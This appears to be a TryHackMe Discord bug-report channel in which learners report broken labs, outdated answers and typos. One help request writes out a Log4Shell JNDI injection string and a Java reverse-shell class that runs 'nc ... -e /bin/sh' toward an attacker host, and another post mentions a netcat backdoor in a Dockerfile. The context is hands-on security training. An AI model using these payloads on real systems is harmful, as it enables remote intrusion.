well if you have world readable on a file like it has it does not matter what tool you use to read it

rugged canyon
crude sundial
#

wait yeah, works fine if i use sudo

rugged canyon
#

yuup as then it is running as root and therefor have permissions

crude sundial
twilit forge
#

submitting bug for room Grep.v.1.7

A few of the domains required to be accessed for this room to be completed are not diaplaying any content. Specifically, the domains load without error, but there is no html content being displayed. Inspecting the page and viewing source show nothing, but the domains do show up during a fuzz and are accessible.

wheat fractal
oblique panther
#

Does make sense ?

misty gull
#

Hi!
Anyone else tried the Intro to Security Architecture room? I'm having issues with answer validation within the static-site; when I input the same values as the name and description, if accepts the former but flags the latter as incorrect...??
set firewall name <value X> description <value X>

sharp kindle
#

I think there is a badges related bug for the new Security Engineer Path. Didn't get the Intro and Risk Management badge. I create a ticket

tropic stump
#

https://tryhackme.com/room/ctf , not able to ping only this machine, vpn file alright, other machines working fine, only this machine, can anyone check , please

hazy tiger
tropic stump
livid escarpBOT
#

Gave +1 Rep to @hazy tiger

stable reef
#

this could be a bug, I'm not sure.

room is tryhackme.com/room/burpsuitebasicsold, I'm told to check the website and explore it, but the site actually never responds, and it stays loading in a loop.

#

and right now I noticed the word old in the URL, why is that? is there a new module?

clear hornet
fiery wedge
#

Hello everyone, this is my first message on Discord, I hope it's in the right section. I would like to report a "bug" regarding the "Soc Level 1" learning path. More specifically, the answers within the "Cyber Threat Intelligence" module -> "Threat Intelligence Tools" -> "UrlScan.io" ("What is TryHackMe's Cisco Umbrella Rank?" and "How many domains did UrlScan.io identify?") are not in line with the information found on the recommended website. Thanks.

stable reef
quaint sparrow
quartz ocean
#

I'm doing the John the Ripper room, I'd like to do the task from the AttackBox. Is the hashlists for the tasks already on the box somewhere? There seems to be some text missing under Task 4.

quartz ocean
# quaint sparrow They are not.

Is there any way of accessing them without having to log on the website on the AttackMachine? For the .txt it's not too much of a hassle since you easily copy paste, however with the zip that becomes a little bit more cumbersome.

quaint sparrow
#

Unless when I have time I can send them to you via updog.

edgy sail
#

Hi Guys.

Not sure whats happening with the Upload Vulnerabilities room task 5.

Never had issues with shells and this is giving me alot of hasstle!

• Ammended the shell with my IP (attack machine ip)
• Uploaded file to site.uploadvulns.thm.
• Travelled to the found directory on the site (it is the correct directory - i checked)
• Its not showing the upload? So i cant execute the php if its not uploading.

Any reason why the site isnt uploading?

hot flame
#

Hi, there might be an error in Intro to log analysis task 6 question 2. It asks for how many http 200 responses were logged in total, using wc, manual counting and online counters return 52 lines but I got 71 by bruteforcing the answer
Or am I missing something?

ivory hedge
#

i found a typo in a room on one of the learning paths, is this the appropriate channel to report it??

rough musk
#

Yep!

ivory hedge
#

its more so the wording at the end seems to be a bit jumbled lol

waxen yoke
#

https://tryhackme.com/room/securesdlc

Task 7 - last question:
"When do you typically carry out Vulnerability Assessments or Pentests?"

Not truly a bug, but I think the answer needs to be fixed. According to the paragraph directly above the question, the answer is "Operations and Maintenance" The correct answer is "Operations & Maintenance." Took me some needless troubleshooting to figoure out the single character is the & symbol. It's not meant to be a trick question (it's not a CTF room by any means).

I would suggest updating the answer to reflect the text above it -- "Operations and Maintenance" to avoid confusion 🙂

fading sandal
#

https://tryhackme.com/room/authenticationbypass
Minor technical mistake: in task 4 of Authentication Bypass, there is a code snippet, which is then referred to as PHP code ("Because the above PHP code ..."). However, the code snippet seems to be JavaScript code. The PHP equivalent of this if statement would be substr($url, 0, 6) instead of url.substr(0, 6). Furthermore, the description of === seems to imply that == would not check casing. This example would also work/have a logic flaw with just the 'normal' ==.

calm frigateBOT
#

:hammer: maheshmiskin#2227 has been banned.

hexed violet
#

Metasploit: Exploitation room, task 2, questions 1/2:

receiving the following error upon trying to run the netbios scanner: "[TARGET_IP] cannot load such file -- active_record/associations/has_many_association"

#

google tells me this is a Ruby on Rails issue, did using msfupdate bork something internally?

quaint sparrow
west estuary
#

Just something I thought I'd bring up with the introtologanalysis room, it looks like the IntroToLogAnalysis directory is missing on the Attackbox. It says it should be in the /root/Rooms directory but the only intro I see is the introdigitalforensics directory.

solid sierra
#

I found a bug in the SQLInjection-Room: https://tryhackme.com/room/sqlinjectionlm - in Blind SQLi - Boolean Based based section: By guessing the table name the last letter or to say character '_' is also valid (instead of 's')
EDIT: Ok, I enumerated another (the wrong) table 'analytics_referrers' which obviously doesn't hold user login data. Ok my bad... BUT the correct table is also susceptible to this bug, also with the last character coolguy

thin raft
#

Is there a bug with a question in the Processes 101 task for Linux Fundamentals 3? I keep getting incorrect answer even though it should just be the reverse of the above question, which I got right. The hint also suggests that I'm doing it corectly, so I can't figure out if it's actually me, or a bug.

quaint sparrow
thin raft
thin raft
quaint sparrow
quaint sparrow
thin raft
livid escarpBOT
#

Gave +1 Rep to @quaint sparrow

digital lantern
hexed violet
tame karma
#

One more problem in that room. This one is more serious. Task 13. The screenshot shows a file in c:\program files (x86)\notepad ++. The Notepad++ folder is not in Program Files (x86) It is in Program files.

Here is a good screenshot

#

Here is the bad screenshot:

#

And another problem. That uninstall.exe file doesn't work with IDA. Here is the error:

#

Some more news. These issues don't prevent you from completing the room. That relies on files in the Task 13 folder. The issue is the instructions make it appear that we are supposed to perform the actions. Apparently, that's not possible.

#

Which is fine. It's just unclear the way it's written.

raw bison
eager mirage
#

owasp top 10 room task 7 site not reachable. when i moved on to next talk it works.

hot cloak
#

Hey everyone on soc path 1 level one on the CTI part I'm on the opencti section and the opencti dash is not accessible having allowed the box to run for a long time to start the cti dash

viral narwhal
#

Passive Reconnaissance, Task 5 (DNSDumpster) should be changed to reflect current THM layout. The answer is remote (Per Google), but that no longer shows on DNS Dumpster.

grizzled briar
#

** Room WebOSINT has an outdated answer in task 7. **
(link: https://tryhackme.com/room/webosint)
In this task we need to use viewdns to get the thing in common between 2 websites. On the ||ip history|| is the link between the two. This is shown in my screenshot.

However, the answer expected is ||Liquid Web, L.L.C.|| eventhough the current history results show ||LIQUIDWEB||.

tired gulch
#

I spent 8 hours trying to do Task 7 in Network Services, at the end I had to google it because there's clearly something wrong with the room, when pasting the msfvenom payload on the telnet server IT WOULDN'T give me reverse shell,

I tried on my own Kali VM for about 4 hours and I could ping my machine from telnet, but iNO MATTER HOW MANY times I tried, I could not receive the shell back, finally i tried for another 4 hours on the web attackbox, and finally it connected, but I WOULDNT give me the flag as you can see on the screenshot the connection was established but the shell wouldnt respond to any commands,

this is extremely frustrating, to just spend a whole day to finally find out the rooms buggy and I wasn't ever going to get the flag anyway, this almost made me give up on the whole cybersecurity thing, because I was getting imposter syndrome, but no, IT was THE BOX that didnt work! And now I'm just extremely burnout.

glad badger
tired hare
#

In Room Subdomain Enumeration https://tryhackme.com/room/subdomainenumeration
you should google "-site:www.tryhackme.com site:*.tryhackme.com" which should return a site starting with "b". However, it doesn't (only some starting with different letters). It can be searched using crt.sh, but this should be somehow fixed.

raw bison
livid escarpBOT
#

Gave +1 Rep to @tired hare

frigid garnet
#

Hello!

webenumerationv2 room's conclusion recommends to try out RPWebScanning (Walkthrough) room, but that room is private.

tacit forge
#

Hi,
i'm attempting to do the tomghost room, when i connect to ssh, do my things (nothing anormal just basic linux commands) the ssh connexion freeze and the ip didnt respond at every ping i try, so i need to reboot it (and it's the third time) and always the same thing after 2/3 min of connection. thanks for your time

oblique panther
tacit forge
#

hi, there is only Host * , no ServerAliveInterval

#

and can't edit because of permissions (still user yet, can't become root because of multiples crashs when i attempt something)

the machine seems very slow but i don't see any big process in the background or idk

frigid garnet
#

In shodan room, Task 3, answers have changed(as of 12 Oct, 2023).

  1. Top operating system is now ||"5.7.39-42-log"|| and not ||"5.6.40-84.0-log"|| as mentioned in the Q hint.
  2. Nginx for Google ASN is now having more ||443/HTTPS w/ SSL|| ports than ||80/HTTP|| ports
  3. Top OS in Los Angeles is no longer ||Debian||, it's ||Ubuntu||.
oblique panther
frigid garnet
#

In room passiverecon, Task 6, 3rd most common port for nginx has changed from ||5001|| to ||5000||

tacit forge
nimble thicket
#

Task 12 "Scoping and Targeting"

We just chose to disable logging for out of scope traffic, but the proxy will still be intercepting everything. To turn this off, we need to go into the Proxy Options sub-tab and select "And URL Is in target scope" from the Intercept Client Requests section:

the image below it is showing to select the option in the RESPONSE section rather than the REQUEST section

weak gate
#

room: CTF collection Vol.1
Task: 18, dig up the past
there is no more the backup on waybackmachine

#

can someone give me the flag?

#

whatever i found it

hazy tiger
#

@oblique panther please don’t post answers here

unborn pulsar
oblique panther
oblique panther
weak gate
unborn pulsar
weak gate
#

Ok!

#

really strange tho, now there is

#

thank u the same sorry for that

#

maybe i spelled bad the site

unborn pulsar
#

Probably the filtering?

weak gate
#

but i did copy and paste

#

filtering?

#

what do u mean?

unborn pulsar
weak gate
#

no i swear there was no backup

#

i mean there was only one but not the right one

weak gate
#

room: Lian_Yu

weak gate
#

is the video necessary to do the room?

rugged canyon
#

not sure

unborn pulsar
wintry gull
#

Room : intromalwareanalysis
Task 6 can't be done as it refer to an report which doesn't exist anymore on Hybrid analysis.
Check the hash of the sample 'redline' on Hybrid analysis and check out the report generated on 9 Dec 2022. Check the Incident Response section of the report. How many domains were contacted by the sample?
there is no more report of Redline - 9 Dec 2022

scarlet bridge
#

Hi guys,
I'm on the "Blue" Room, Task 2.
I can't run the exploit idk why. I tried on my vm, reboot the machine 2 times and tried on attackthebox as well, nothing work for me.

scarlet bridge
quaint sparrow
scarlet bridge
#

Nop 🙄

quaint sparrow
scarlet bridge
#

Surely 🫣

#

Thanks anyway ! 😂

placid abyss
#

!dark

tropic flameBOT
#
DarkStar7471
Very carefully, next question.
heavy tusk
#

At complete beginner path
I can't download linenum.sh,linpeas.sh and lse.sh.
Also i don't have the permissions to copy it into a file or the ability to change the chmod. Or even wget through simple http server or even through scp.

#

Basic pentesting room

#

Also at Vulnversity room. I used a manual command to search for suid files

#

Because the remote machine didn't allow me to use any of the previously mentioned files.

lucid jacinth
#

Hi There, I lost my progress in burpsuite room, anyone had the same issue?

quaint sparrow
lucid jacinth
#

okok, thanks!

unborn pulsar
unborn pulsar
# heavy tusk /home/user

Does the user you have access to have write permissions on those folders you intend to write or save files into? Have you tried the /tmp folder?

livid escarpBOT
#

Gave +1 Rep to @unborn pulsar

oblique panther
quaint sparrow
#

You'll also know it's not listening on tun0 as you won't set it.

oblique panther
static grotto
#

Room: Intromalwareanalysis, Task 6, the question asks you to check the report on Hybrid Analysis created on 9 Dec 2022. This report no longer exists for the redline hash given. Further, finding a medium writeup, I checked the existing reports on Hybrid Analysis and none of them contain that number of contacted domains

static grotto
#

Room: phishingemails2rytmuv, Task 5. The help article on help.netflix.com has slightly different wording than the answer ("email" instead of "message"). Without clicking "Hint" to view a random article, I would imagine most users would look to the official source of Netflix for this answer.

fossil grove
#

Hi @dusky junco, I just ran into the same issue as Sapient did on this room. I wanted to go through the full Jupyter 101 path as a quick refresher, but the support material link is down, and I cannot start Jupyter in the attack box. I've spent some time troubleshooting it, but as far as I can tell, the room is broken right now and can't be completed. Are you able to update it?

glacial flint
#

Hi everyone, I'm working on Blue box, and i'm trying to mannually exploit eternal blue (with the old python exploit) .. When i'm trying to lunch the exploit with user guest, i get an error : STATUS_ACCOUNT_DISABLED even with a restart of the VM, any hint to resolve my case ? (i manage to run the exploit correctly on others box..) Thanks ! ( i just tried with metasploit and it's working correctly..)

wintry gull
#

ROOM : THMREDLINE1.7.3 - Task 5
Not enough space on the machine to import the IoC file

#

Also maybe give a bit more resources on the machine, had to wait 1 hours to complete the scan and the redline analysis

waxen yoke
boreal hamlet
#

after connecting to the target system I have problems like this, the codes I wrote do not work. I have closed and restarted the room, changed my vpn but still the same. Can u help please

#

I can't move forward in any way. I'm stuck here.

unborn pulsar
wide arrow
#

obviously this still is an issue... now you have to look up 9 Dec 2022, but this also isn't listed on hybrid analysis. Nevertheless great room.. 🙏 !

fierce birch
# edgy sail Hi Guys. Not sure whats happening with the Upload Vulnerabilities room task 5....

Did you figure out the issue with Upload Vulnerabilities task 5? I think I'm have the same issue in that step. I can bypass the client-side filtering, but I still can't upload a non-png file. I had other issues too. The first one was that the demo-subdomain was being rickrolled, which made it difficult to use in later steps. And subdomains references in task 3-4 seemed to be the wrong ones, out of lock-step.

edgy sail
#

Think that room has got a few issues tbh mate. I tried the same process on dummy machines and worked so had to be the room imo

fierce birch
livid escarpBOT
#

Gave +1 Rep to @edgy sail

golden night
#

gotta delete task 7 (endpoint content) to free space to do task 6 then restart the room to do task 7

sudden gorge
#

Hi

hard fern
#

Web Enumeration room, introduction to Nikto, link is pointing to 404 page

ornate solar
#

I want to report a bug at Burp Suite: Intruder room, Task 12 doesnt work unless you do it from attack box! Any idea?

tame karma
graceful mantle
#

Hey All, doing the Year of the Jellyfish, yesterday the machine randomly lost connection and i was not able to ping it

#

Having the same issue today:

#

Is my ip blacklisted?

quaint sparrow
#

did you get this one from the room, yeah?

quaint sparrow
graceful mantle
#

Yeah i did, and no nmap is also not working sadly

#

It's like my ip is blacklisted somehow

quaint sparrow
#

Is it still up?

graceful mantle
#

Lemme spawn a new instance and try again

#

Still cant ping lemme try the nmap

#

I am however able to nmap it

#

Upon trying to connect to the websites i get an error tho

#

oh nevermind

#

It somehow worked this time

#

Thanks 👍

whole nymph
#

Im working in Wreath Room. on step 17 when i put in ./nmap-USERNAME -sn 10.x.x.0/24 -oN scan-USERNAME, I get an error message stating: ./nmap-USERNAME: line 1 syntax error near unexpected token 'newline' and ./nmap_USERNAME: line 1: '<DOCTYPE HTML.' . Any idea why this is happening?

obsidian kiln
whole nymph
obsidian kiln
#

Which task?

#

17?

#

That should just give you the binary. Worked for me 🤷‍♂️
I've updated the link to be identical to the one on the Github page for the binary though. See if that works

#

I'd also suggest running file on things you download before trying to execute them 😆

naive osprey
#

at the bottom of room Web Enumeration v2 Task 13 is the link https://tryhackme.com/room/rpwebscanning but it says room is private.

wheat fractal
#

WINFUN1.1 in WIndows Fundamentals 1 is not working for some reason .

VPN is working just fine but can't ping the machine

gleaming shadow
quaint sparrow
wheat fractal
wheat fractal
quaint sparrow
#

Yeah, the hint states the website doesn't work

inner terrace
#

Yes. it is. How am I supposed to get the flag and finish the room?

robust niche
#

There is a bug in this room: https://tryhackme.com/room/bppenguin

When you remove the "unused accounts" and also remove home directories, etc passwd, group and any cronjobs (didnt exist in this case) the get-flags program seems to break, and youre unable to get the flag for this task.
Which is something you should do, not leave behind a bunch of crap

quaint sparrow
#

Nobody is you to spend bitcoin?

wheat fractal
inner terrace
quaint sparrow
inner terrace
quaint sparrow
inner terrace
quaint sparrow
inner terrace
quaint sparrow
inner terrace
#

I know. I hope they'll answer next week

boreal hamlet
#

There's a problem with task 3 in the 'easypeasy' ctf room.

quaint sparrow
boreal hamlet
#

answer: 65524 but doesn't accept

quaint sparrow
#

Ah, I see the issue.

boreal hamlet
quaint sparrow
#

It's not asking for the port number, it's asking for the service.

boreal hamlet
#

thank you

unborn pulsar
#

Can you remove this please so as not to spoil it for other users? Thanks.

finite sphinx
#

Hey, I'd just like to mention that the room WebOSINT is not pratically doable without previously written writeups (informations have been modified and aren't as easy to get as initially planned (sometimes you can't even guess))

#

Example : you're supposed to check the number of times the domain "republicofkoffee.com" has changed names.
The answer is 4, but when you do the research with the given tool, you get over a thousand (I didn't count them)

rugged canyon
fading sandal
unborn pulsar
fading sandal
fading sandal
#

Found another mistake, in room https://tryhackme.com/room/sandboxevasion, task 4, taking a nap, the example code is wrong. It should contain example code for sleeping but instead contains a copy of the example code from the querying network information section. There's also a mistake in that code; there are parentheses missing at the function call (should be isDomainController() == TRUE)

clear birch
#

I can't find the lesson files on the attack box for this room
https://tryhackme.com/room/johntheripper0
using a share anywhere link to work around it but am I missing them entirly or is there some other way to transfer these files to work on in the attack box enviroment.

clear birch
quaint sparrow
#

The files aren't on the attackbox, I'm sure it's in the massive list I've gave Ben 😂

clear birch
#

lol

#

sorry to add.. at first i was trying to see if i could vpn from my machine and use SCP to transfer them over .. but figured the in machine browser and a share link would work for now.. just rather use wget or scp or someting to send them over but .. just wanted to help get it on the radar etc.

quaint sparrow
#

You could in theory.

But you'd need to be on the network

#

And I don't suggest putting your host on the VM.

#

I have an idea.

quaint sparrow
#

Try that command

clear birch
#

so vpn in my machine and then use wget or is that IP the loaction of the class files.. change file name per task accordingly?

quaint sparrow
#

That's my VM.

I'm serving a python server for you to download them.

Use the attackbox.

clear birch
quaint sparrow
#

The file names are what they're called.

#

So if the python server is used in that directory with that name.

clear birch
#

bummer the send anywhere link wont take the rar file.. the wget commad

clear birch
clear birch
#

from the attack box..

#

im just gunna bit the bullet and log into the THM class room from the attack box and download that way .. just didnt want to log into the VM with my real account or anything for some reason

#

plus for some reason it keeps resizing and shrinking the browser while its loaded into a hard to read / use window

quaint sparrow
#

I wouldn't suggest that...

clear birch
quaint sparrow
#

Do you have the resources for a VM on your laptop/Desktop?

clear birch
#

not really use it while im traveling mostly i could but my plan was to just buy a new HD and back up the data on thsi one then install kali native to it

#

just havn't gotten around to it quite yet

formal gorge
#

Hi THM team,

There is a small typo in the following:
Complete Beginner (Learning Path) > Network Exploitation Basics > Nmap > Task 13: Firewall Evasion.
It can be found under the fourth bulletpoint --badsum where the following is being stated: "This is used to generate **in **invalid checksum for packets.".
I believe "in" should be "an".

I also sent this via the "feedback" page of THM.
Just letting you guys know!

wispy karma
#

hello

rugged canyon
#

ello.... would recommend you describe the bug you are having and posting that here

quartz rose
#

Room: Remux The Tmux
URL: https://tryhackme.com/room/tmuxremux
Task: #3
Question: #9

The correct answer should be ctrl b shift } (Rotate current pannel clockwise)
but I had to enter ctrl b shift { to receive a correct answer.
Clockwise and counter-clockwise CAN'T be the same command...

clear hornet
#

It accepts both it seems (I think tryhackme accepts questions that are like one character off or something, but in this case that means a completely different answer).

quartz rose
#

Ok. I tough you should know.

clear hornet
#

Yeah it is a bit confusing, I get wanting to accept like "Web Browser" & "web browser" or something, but having a single character difference here is all the difference

quartz rose
#

ok then have a nice one!

clear hornet
#

You too!

rugged canyon
tame karma
unborn pulsar
hushed scaffold
#

cd /

frank wagon
#

Hey everyone, I am currently working on the binary exploitation room and I cannot really connect to the virtual instance using the ip and port provided. Any ideas or help are really appreciated

#

[-] Opening connection to 10.10.5.167 on port 9007: Failed
[ERROR] Could not connect to 10.10.5.167 on port 9007

this is the error

#

I have tried to reset the machine but it does not seem to work

unborn pulsar
frank wagon
molten oriole
#

Can anyone help me on Willow? I'm getting stuck on something

clear hornet
livid escarpBOT
#

Gave +1 Rep to @unborn pulsar

unborn pulsar
pure anvil
#

Hi there, someone can help me with this

#

I'm unable to join this room

#

I already clear browser history, cookies and tried in several browsers. All of them gave me the same problem.

quaint sparrow
#

Sub or streak of 7

pure anvil
#

Subscriber

#

The others rooms of Active Directory I’m already joined in but this one is giving me a lot of troubles to join.

plush owl
#

Hi everyone, i am new in cybersecurity, there is a problem in Tryhackme website their is a my-machine page/link and it is not working

rough musk
#

^ "Start your first machine" task still links to this page

plush owl
#

Sure..

placid abyss
#

Link?

plush owl
#

Here are the tasks for access your own machine

#

And in every task there's a page linked as my-machine that is 404

placid abyss
#

cc @glad badger

glad badger
plush owl
#

Thank you! well i know this feature too 😊

glad badger
placid abyss
glad badger
frank wagon
livid escarpBOT
#

Gave +1 Rep to @unborn pulsar

outer pollen
#

Room: Meterpreter
Task 5 - Win4Meterpreter
Question 4: What is the NTLM hash of the jchambers user?

It looks like this is supposed to require migrating your process (per the hint), but you can actually grab that hash straight away with just the initial access.

ripe pollen
#

Hey, I think the room https://tryhackme.com/room/insekube in Task 7 is broken: When I look at the Pod status with kubectl get pods, it remains in ImagePullBackOff.yaml imagePullPolicy: IfNotPresent in the yaml-file is set. Can someone please help me or check this? Many thanks 🙂

little umbra
#

Room: Ustoun .The port 1433 never open so the room can’t be completed

maiden zephyr
#

have just been in Post-Exploitation Basics, the server kept dropping, was in another windows room earlier and found this aswell

#

is this a common problem? or is it just a heavy day?

lime nest
past pawn
#

I think OWASP Juice Box is "broken" at task 7. Will not return flags, (I'm not the only one having this issue) despite following instruction to a T, and exact copy for code. URL modification won't function to return flag either... watch other walkthroughs to ensure I was doing it correctly... doing via attackbox, but not working.

stone tiger
#

hai, room Kenobi smbclient not connected it was "do_connect: Connection to 10.10.221.48 failed (Error NT_STATUS_IO_TIMEOUT)
" how to fix them

ocean apex
fading escarp
hollow oyster
unborn pulsar
hot blade
#

hey channel, I'm doing https://tryhackme.com/room/netsecchallenge and the last challenge seems to be broken. I see failed websocket connections from the target site. Doesn't work from both my Kali vm and the AttackBox

hot blade
quaint sparrow
#

What about -Sn?

hot blade
#

same

quaint sparrow
#

-sn ?

hot blade
#

same no reaction

quaint sparrow
#

Which environment you working in currently?

hot blade
hot blade
#

have no idea what was it, but now I've restarted both AB and VM, and it started working. Interesting thing is that I already restarted the vm and tried in different combinations - with kali and attackbox

#

so, I guess, problem is solved for me, but ... it's quite frustrating for a newbie like me, when you are not sure what is happening

gloomy briar
#

Hello, hope this is the right room to post this... I'm working on the Intro to Malware Analysis room and Task 7 asks you to search for a hash on Hybrid Analysis and answer questions based on the report dated 9 Dec 2022. This report no longer appears to be available; there are 5 reports showing and the oldest is from March 2022. Thanks

sudden cedar
#

Hope that helps!!!

livid escarpBOT
#

Gave +1 Rep to @sudden cedar

wary beacon
#

https://tryhackme.com/room/webosint

Task 2 Question 2 - Seems outdated. As it has changed.
||New: 9854014545 Old: 6613102107||

Task 2 Question 5 - Seems outdated.
||Panama -> Iceland||

Task 4 Question 3 - Seems outdated. Could maybe define a time range?

vagrant pine
#

@dusky junco I'm currently doing your Docker Rodeo room. I believe I found a mistake in "Vulnerability #3: Uploading Malicious Docker Images". The malicious Dockerfile uses RUN nc -e ..., but RUN commands are executed at build time, so the attack would work if someone tried to docker build your Dockerfile (also an interesting attack vector). I imagine you had in mind CMD nc -e .... Also, apt-get update no longer works on jessie, maybe the example could be updated to buster (netcat on bullseye doesn't seem to support -e). Anyway, thanks for creating the room!

livid escarpBOT
#

Gave +1 Rep to @dusky junco

light musk
#

Expose as of yesterday is having issues,

can ping using nmap and scan but cant access the website IP, cant use gobuster either and the THM relies on the website as its RCE through the website

quaint sparrow
light musk
#

there is only the IP to access from for this box

quaint sparrow
#

Yeah, but have you tried to nmap it?

light musk
#

...
I was able to get a response in detail with this command

#

nap -sV -sT -V T5 -A --script vuln,exploit <IP>

#

but nothing else worked

quaint sparrow
#

Ok, and what was the response?

light musk
#

vulners exploits whats in the web, full detailed response, version, i also used whatweb and it worked but gobuster did not

#

/ dirbuster

quaint sparrow
light musk
#

i did this yesterday bro,

port 80, 443, 22, 3389 (I think 3389 not sure)

quaint sparrow
#

Are you sure 80 was returned?

light musk
#

yes

quaint sparrow
#

I'm about to try.

#

But I don't think port 80 was open.

light musk
#

I looked up a review as well and its a whole ass website for it

quaint sparrow
light musk
#

idfk i went into a walk through for the exact same thm and it had the website up and loaded for an RCE or some shit like that

#

I see where i went wrong...
port 1337

quiet pawn
#

In the room CTF LazyAdmin I found the directory /content/. There is the following text: More help at Tip for Basic CMS SweetRice installed. But when I click on the link I came on a website and there stand: "
The domain Basic-cms.org may be for sale. Click here to inquire about this domain.
Basic-cms.org". Therefore I cannot read the information which I need for the solution of the CTF LazyAdmin.

unborn pulsar
broken crystal
#

I'm not sure if this is the correct place to report it as it is not a bug per se, however, I'm getting a rather obscene gobuster output when doing the Expose Linux machine.

quaint sparrow
#

Could be false positives.

#

I've forwareded it on.

hazy tiger
#

Yikes, room link?

#

And what wordlist are you using?

broken crystal
broken crystal
hazy tiger
broken crystal
#

openvpn to connect from my kali, otherwise,no

#

im running it again to see if it will replicate

#

yep, same thing happens, idk how or why

eager glade
#

Got a bug to report to who should i send image

quaint sparrow
#

Whats the bug?

inland lava
calm frigateBOT
#

Done!

misty gull
#

Hi All!
I could really use a sniff-test here (did something get patched?):
on https://tryhackme.com/room/shaker I'm not able to get the revshell callback to work with ||${${::-j}ndi:ldap://<ATK-IP>:1389/myRevShell2}||

  • the ||logsXXXX/ folder doesn't show any errors||
  • I can see the ||LDAP & HTTP requests|| coming in and going out successfully:
    • ||jndi-exploit-ldap-1 | Send LDAP reference result for myRevShell2 redirecting to http://<ATK-IP>:8000/myRevShell2.class||
    • ||jndi-exploit-jndi-http-1 | <ATK-IP> - - [18/Nov/2023 15:33:15] "GET /myRevShell2.class HTTP/1.1" 200 -||
  • and I've tried 2 different ||java class revshell|| formulations (using: ||/bin/sh||), e.g.:
    ||public class myRevShell {
    static {
    try {
    java.lang.Runtime.getRuntime().exec("nc <ATTACKER_IP> <NC_PORT> -e /bin/sh");
    } catch (Exception err) {
    err.printStackTrace();
    }
    }
    }||
placid abyss
#

@gleaming shadow hints?

gleaming shadow
#

maybe, give me a sec to read

gleaming shadow
#

structure looks alright though

#

might need to handle the socket on the java side as well 🙂

gleaming shadow
misty gull
gleaming shadow
quick wolf
#

Could I get a check on this room: https://tryhackme.com/room/nerdherd

The issue is regard to enumerating the SMB share. Eevery one of the write-ups use either enum4linux or rpcclient to retrieve the username. I could not get either tool to work, and couldn't find any alternative enum4linux scripts that could complete the task. This made it impossible for me to complete the challenge without looking into the writeup for the username.

Edit: Using the Kali VM.

modern kite
#

any updates on HoloLive room. Downloaded the hololive VPN but it's just empty file.

woven shadow
plush owl
plush owl
#

Okay so why we are not allowed use ?

quaint sparrow
#

Could be made private as it's old.

plush owl
#

Hmm okay thankz

silent saffron
#

Network Services
Task 7
Great! It's an open telnet connection! What welcome message do we receive?
There is something wrong? i fill out the anwer but it registers as wrong?

unborn pulsar
silent saffron
#

Yes there was, i just copied it in.

#

||SKIDY’S BACKDOOR.||

unborn pulsar
silent saffron
#

Rebooted the machines to get it to work.

misty gull
#

Some small typos in https://tryhackme.com/room/threatemulationintro
Task 2:

  • Has the technology in use [been] properly configured and [is delivering] value to the business?
    Task 5+6: Mini-sites > Introduction:
    There are two rounds, each round comprising of three questions related to a specific attack strategy that is being implemented.
spark apex
#

maybe can i get a sanity check?

spark apex
#

okay found it through the writeup

#

it needs to be updated since it has been changed on vt

quiet pawn
#

I am sorry, the openvpn didn't work.

unborn pulsar
livid escarpBOT
#

Gave +1 Rep to @unborn pulsar

remote pond
#

Hi, is an admin is available. I have problems with rooms answers. Thanks

quaint sparrow
remote pond
#

many rooms, linux fundamentals, linux modules among others

quaint sparrow
#

Then there is a high chance you may be entering the wrong answers.

But I can't help you, if you don't tell me more specifics.

remote pond
#

the answers are not relevant, I think there are bugs

quaint sparrow
#

Ok, can you specify more please?

remote pond
#

sure, for example, task 7 on Linux fundamentals 1 room, question
"Now if I wanted to add "tryhackme" to this file named "passwords" but also keep "passwords123", what would my command be"
accept echo tryhackme > passwords

quaint sparrow
#

And what did you try?

#

Well that's wrong.

#

It's not a bug.

remote pond
#

for added tryhackme to passwords and keep passwords123, answer need to be echo tryhackme >> passwords

#

not >

quaint sparrow
#

Yeah, but in your answer above, you only have one > 🙂

remote pond
#

if we send echo tryhackme > passwords, we deletes passwords123 which is present

#

yes, it's problem, question is solved with echo tryhackme > passwords too

quaint sparrow
#

>

quaint sparrow
#

Where as >> appends it.

remote pond
#

What I mean is that the site accepts the "echo tryhackme > passwords" response when it shouldn't.

It also accepts "echo tryhackme >> passwords".

quaint sparrow
#

I understand you now.

#

It's answer tolerance.

remote pond
#

ah ok, thanks

#

and on linux modules task9, I try to find

"Download the file given for this task, find the uniq items after sorting the file. What is the 2271st word in the output."

cat -n file.txt | sort | uniq and my 2271 lines is gunners (with sort -r to) but I can't solved it

#

the taskfile changed?

#

so, when I grep 'michele' she is on line '2379' but i can't solved it too

quaint sparrow
#

Did you do the two commands?

remote pond
#

Yes, of course, with the name of the file it downloaded to me (instead of file.txt).

uncut prairie
misty gull
misty gull
quick wolf
woven adder
#

Hello,

I tried to do the USTOUN room last night for 2 hours without finding where to go. So I went to see a writeup and I noticed that the port through which I am supposed to go is not open even after waiting several tens of minutes. Have you ever noticed this problem? THANKS

livid escarpBOT
#

Gave +1 Rep to @unborn pulsar

ruby nymph
#

https://tryhackme.com/room/redteamthreatintel
Task 5
Question 2:How many Command and Control techniques are employed by Carbanak?
Expects a 1 number answer whereas the answer on the site is 17
https://mitre-attack.github.io/attack-navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0008%2FG0008-enterprise-layer.json

ruby nymph
hardy wasp
naive osprey
#

Advent of Cyber 2022 - Day 21 MQTT

  • typo: "Recall how we mentioned that the combability of device protocols"

this is found underneath the diagram of Client A to client B with middleware

true warren
covert field
quick wolf
#

Room: https://tryhackme.com/room/powershell
Task 6: Intermediate Scripting
Goal: Create a Powershell script to scan for open ports on the local network on ports 130-140.

Question: I'm trying to understand how the answer is ||11||? Only 1 attempt responds with TCPTestSucceeded = True, the rest failed.

Can someone confirm or let me know if I'm wrong?

unborn pulsar
#

What browser are you using?

unborn pulsar
unborn pulsar
quaint sparrow
covert field
#

Firefox 120.0 (64-Bit)

true warren
quaint sparrow
true warren
#

Only the creator can do that?

unborn pulsar
devout bolt
#

umm, i'm trying to do this room again today and I'm faced with a very strange problem...when I try and use mimikatz to do a full DC sync I get an error - I did a google search and it appears that the problem is when the environment variable of %LOGONSERVER% isnt set. I tried to manually set it (with administrator account) but it didn't take...probably some fancy lockdown settings for shared environments. Anyhow, just wanted to report it....and hopefully get to doing the lab again. Thanks https://tryhackme.com/room/persistingad

teal barn
#

PS : Firefox 120.0

twin bramble
#

Hi, I have a problem with the golden ticket in the Active Directory exploiting room. I've tried four times with my kali vm and the attackbox but it doesn't work. but I'm sure I've got the ticket

unborn pulsar
junior shore
#

Splunk 3 VM running like a dog, please fix

quick wolf
devout bolt
devout bolt
devout bolt
#

here is the command I used:
